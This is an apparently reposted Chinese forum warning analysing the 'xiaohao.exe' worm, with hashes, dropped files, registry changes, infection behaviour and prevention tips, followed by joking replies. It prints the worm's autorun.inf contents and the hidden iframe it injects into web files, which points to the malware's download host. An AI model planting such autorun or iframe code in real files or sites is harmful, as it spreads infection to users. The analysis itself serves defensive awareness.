[转载] 警惕恶性蠕虫病毒"xiaohao.exe"(浩字病毒）！

File: C:\Documents and Settings\Administrator\桌面\xiaohao.exe
Size: 12288 bytes
File Version: 1, 0, 0, 1
Modified: 2007年8月14曰, 21:03:22
MD5: B50ED06B61CDCF060D0136784999E50C
SHA1: ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD
CRC32: 5CC1E47A
加壳方式:UPX
病毒运行后：
1.生成如下文件：
%SystemRoot%\system32\exloroe.exe
每个分区下生成一个xiaohao.exe 和autorun.inf
autorun.inf内容
[Autorun]
open=Xiaohao.exe
shellexecute=Xiaohao.exe
shell\Auto\command=Xiaohao.exe
2.添加注册表项目
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB
-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
指向 %SystemRoot%\system32\exloroe.exe达到开机启动目的
3.修改注册表键值
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\
Hidden\SHOWALL\CheckedValue为0x00000000
破坏显示隐藏文件
删除
HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start
Menu2
从而删除开始菜单中所有的快捷方式
4.感染文件
从系统盘开始 查找所有*.exe的文件 将自身病毒体写入到正常文件中，被感染后
的文件图标为一个表示有“浩”字的图标，病毒采取覆盖感染的方式，被感染的
exe无法修复
从系统盘开始 查找所有*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 在其尾部
加入代码
<iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0
height=0></iframe>
所有感染的文件的文件名记录在C:\Jilu.txt里面
并将所有未能感染的文件属性变为隐藏
5.病毒运行时，所有窗口标题变为“已中毒，X14o-H4o's Virus”
6.系统时间改为2005年1月17曰
病毒作者将其QQ号码和博客公布于互联网上，以此炫耀自己的技术。作者的行为和
原先的兔子病毒很相像，为了炫耀。
由于病毒感染所有exe文件 所以重启以后可能会造成ntoskrnl.exe，ntkrnlpa.exe
等核心启动文件被修改从而造成系统启动失败
如果中了此类病毒 那么几乎等于判了死刑 必须重装系统 而且要将其他盘里面所
有的*.exe,*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 文件删掉
希望大家注意如下几点防范此类病毒
1.安装还原精灵、冰点还原、雨过天晴等还原软件（没装还软软件的参考下两条）
2.及时升级杀毒软件，防火墙，一定打全系统补丁
3.禁用U盘等移动设备的自动播放功能：在“开始”菜单的“运行”框中运行
“gpedit.msc”命令，在“组策略”找到“计算机配置”和“用户配置”下的“管
理模板”功能，打开其中的“系统”菜单中的“关闭自动播放”的设置，在其属性
里面选择“已启用”，接着选择“所有驱动器”，最后确定保存即可。

好狠的毒.....

那我闪人了

额............
貌似和我关系不大额........
我从来就没开过自动播放........
每天卡巴是自动更新的........
每次登QQ时会自动检查系统漏洞额........
感觉防御得狠不错了额........

楼主的名字是鸭血粉丝,是南京人?

能吃么？
肚子饿了
谁请我吃饭？

最近新看见一病毒.....
叫大红猩猩.......
能力比小浩只高不低...
最精辟的.....
它还对杀毒软件进行了评价......
瑞星2008....不推荐.........
金山2008.....吹水得厉害........
江民2008.....技术不错......如果你非要买国产的...就他吧.....
如果你的机子运行的起的话...推荐你用卡巴7.0........主动防御很不错的哦......


看后我当场郁闷在厕所里了